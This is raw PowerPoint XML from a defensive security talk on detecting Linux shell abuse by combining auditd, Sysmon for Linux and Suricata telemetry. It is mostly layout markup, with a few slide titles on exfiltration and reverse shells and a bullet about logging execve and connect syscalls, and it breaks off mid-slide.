            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s move on to the four categories of use cases I dug into and use a blended strategy of host-based telemetry from auditd and Sysmon for Linux with enriched network signals from Suricata to approach these detections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D95C4B6-EBFD-9500-E83A-30B5A9CE69D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8015FCD4-BCAA-410D-9382-F23652255616}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3749950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jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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1.jpe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jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><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2.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jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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971799" y="0"/>
            <a:ext cx="16287501" cy="861434"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="21716668" cy="1148579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 4"/>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01/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="AutoShape 5"/>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0" y="822848"/>
              <a:ext cx="3682667" cy="325731"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="1920"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Horizon"/>
                  <a:ea typeface="Horizon"/>
                  <a:cs typeface="Horizon"/>
                  <a:sym typeface="Horizon"/>
                </a:rPr>
                <a:t>November,, 2025</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16426965" y="1903430"/>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2294229" y="4990532"/>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9" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13187700" y="8439490"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="AutoShape 10"/>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1" name="AutoShape 11"/>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12" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2381731" y="1586181"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="AutoShape 13"/>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4" name="AutoShape 14"/>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
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 15"/>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0" y="2324100"/>
            <a:ext cx="17283060" cy="5524589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="11226"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Bridging Host and Network: Enriching Linux Shell Abuse Detection with Suricata And host telemetry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="11226"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Presented by: Ted Skinner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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F479EE-ED5F-1300-A49A-C807051E0F4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5BFE826-BEB6-7165-5C9A-3CF37FBFE2EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B603EECD-FDDB-82ED-55D9-CD7CBF664115}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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02/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88ADC54A-4D07-012B-64A8-D7EA211C5022}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A9D5E5E-7903-77F7-C6C0-9DD611D923D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="913220" y="4708007"/>
            <a:ext cx="1426093" cy="1426093"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="375596" cy="375596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2144D068-AEDD-62E7-75E2-612CC2F1AA67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F6CE32E-3122-4425-2ABD-4883843F4219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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15" name="Group 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A2B8C7-312C-F458-F70D-F41DEFD4FF86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11131624" y="2596090"/>
            <a:ext cx="6652765" cy="6652765"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{238CCBFF-40AC-D944-F48C-086F742E4EBE}"/>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51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979ECDA-3693-14DE-9DFD-5E632DE0AD69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10783354" y="2577199"/>
            <a:ext cx="6652765" cy="6652765"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C610A2A0-E17D-88D6-31F1-514415AFFA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3"/>
              <a:stretch>
                <a:fillRect l="-25046" r="-25046"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE4C48E8-209B-850C-994D-1203E0C61994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966308" y="-2821344"/>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TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2608B7E4-4D90-07DD-1A73-96922FBEE26C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741283" y="4972050"/>
            <a:ext cx="1769968" cy="796372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7429E51-4F54-E115-295F-9FCAD5DCA43B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="4866445"/>
            <a:ext cx="15007906" cy="1267655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>How Suricata and Host </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5113"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Telemetry Work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F700A4FB-C0A4-9C2C-B6BA-D944001706C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971798" y="1599585"/>
            <a:ext cx="15951755" cy="1769715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="7235"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C51AF6"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Exfil/Reverse Shell/Post Exploit &amp; Suspicious Downloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143C58C7-9E06-9832-4DD9-C81096DDB386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4925769" y="438346"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="AutoShape 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AED94C26-2ED0-045E-3FF5-3851A38D2FD6}"/>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32" name="AutoShape 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B4A9CB3-3842-A7B1-0FC5-967B9588CF75}"/>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33" name="Group 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4897AA88-A1EE-4451-C0CA-67D593FE4E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="16801622" y="2704430"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="AutoShape 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B7FBEB-6FD2-E309-F1C1-CD6DFFF78514}"/>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35" name="AutoShape 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127F0981-285E-99F8-39D9-AB6B87F066ED}"/>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
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF19CBD8-AC41-19CA-1284-F5196CD403E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16819463" y="9439334"/>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1870469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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E06DEE4-92DA-B7D3-DBAD-3625B8C622BE}"/>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032F77B2-37DF-932E-7075-608003F4A535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10775967" y="1759241"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AF1843F-CC61-9EEC-B30E-6F39441A8DC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA5849C4-D36F-B20F-29E8-25FCB0CC5D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10911840" y="1557535"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A513CFE-A9C9-C297-C781-34A507537D38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-11942" r="-11942"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E4DEBD-7F16-7B90-844D-95F50392113A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3186512" y="409735"/>
            <a:ext cx="6726491" cy="771365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Reverse shell setup </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47831060-16F1-65F0-1B38-D0B8A96720AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="2019300"/>
            <a:ext cx="8679875" cy="5190460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Use auditd rules to log execve of suspicious programs and connect socket syscalls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
